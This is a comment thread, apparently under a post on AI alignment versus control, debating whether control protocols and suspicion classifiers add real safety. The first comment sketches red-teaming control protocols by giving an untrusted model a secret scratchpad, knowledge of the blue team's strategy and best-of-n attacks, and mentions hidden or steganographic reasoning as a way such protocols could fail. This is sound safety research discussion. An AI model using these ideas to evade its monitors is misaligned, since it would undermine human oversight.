7 Comments

I completely agree that control seems like a temporary patch to get useful work out of early TAIs rather than something you could use to safely deploy a superintelligence. Confidently aligning our models sure would be nice, but it looks increasingly likely to me that the AI race will proceed full steam ahead whether alignment is solved or not – and in that case it is imperative to ensure we can use early TAIs to help with alignment before it's too late, whether they are perfectly aligned or not. Control seems to me like one of the most tractable ways to do that.

One way to try and get closer to the upper bound of capability when red-teaming a control protocol is to give the untrusted model more affordances than it will actually have in practice, like a secret scratch pad, perfect knowledge of the blue team's strategy, best-of-n attacks, and help from human red-teamers. If the model becomes impossible to control with some generous set of extra affordances, determining which ones are necessary might help pin down the weaknesses of the control protocols being studied. For instance, if the model can beat a control protocol with a secret scratch pad but not without one, it becomes quite important to test whether the model is capable of doing steganographic / hidden reasoning. If some control protocols can be broken with perfect access to the blue team's strategy but not without it, it becomes imperative to ensure that control protocols in practice are kept a tightly-held secret and untrusted models are not trained on information which would let them make educated guesses.

Expand full comment

I agree that models don't need to be perfectly aligned to help with alignment research. The question is how much value control will add between the time when models are smart enough to cause misalignment problems but not so smart to make control difficult.

But maybe I'm more objecting on spiritual grounds, where I worry too much effort on alignment research is directed towards exhibiting problems and controlling AI. The mainline goal should just be to solve alignment.

I'm not sold on the additional affordances. You might just make the model better along some axes and not others, but if you're not Pareto-dominating a fully elicited schemer, you can't be sure that you're red teaming enough.

To be clear, I still think it's good to deploy sus classifiers, but it seems rough to gain a lot of confidence that they're adding much safety margin.

Expand full comment

I agree that there are difficulties with evaluating control techniques, but my sense is that the difficulties with evaluating alignment techniques are even bigger.

Curious what you think about the comparison. Do you think it seems easier to gain a lot of confidence that alignment techniques (that are realistically achievable in the next couple of years) are adding a big safety margin, as compared to control techniques?

Expand full comment

I am definitely optimistic! Alignment isn't optional so there really isn't any way around this

Expand full comment

Jan, I think we both know that this is just counting angels on pinheads at this point, no?

Expand full comment

Would you say we have a good understanding of what an aligned model ought to act like? And if so, is ‘solving alignment’ in your opinion more about having models be consistent at the thing we want it to do - or do you feel we as humans have some work to do envisioning how an aligned, highly capable entity is supposed to behave?

PS. Foucault would probably disagree with your final conclusion that alignment is not about control.

Expand full comment

I would suggest that the first test of an aligned model is that it doesn't try to kill us, directly or indirectly?

Expand full comment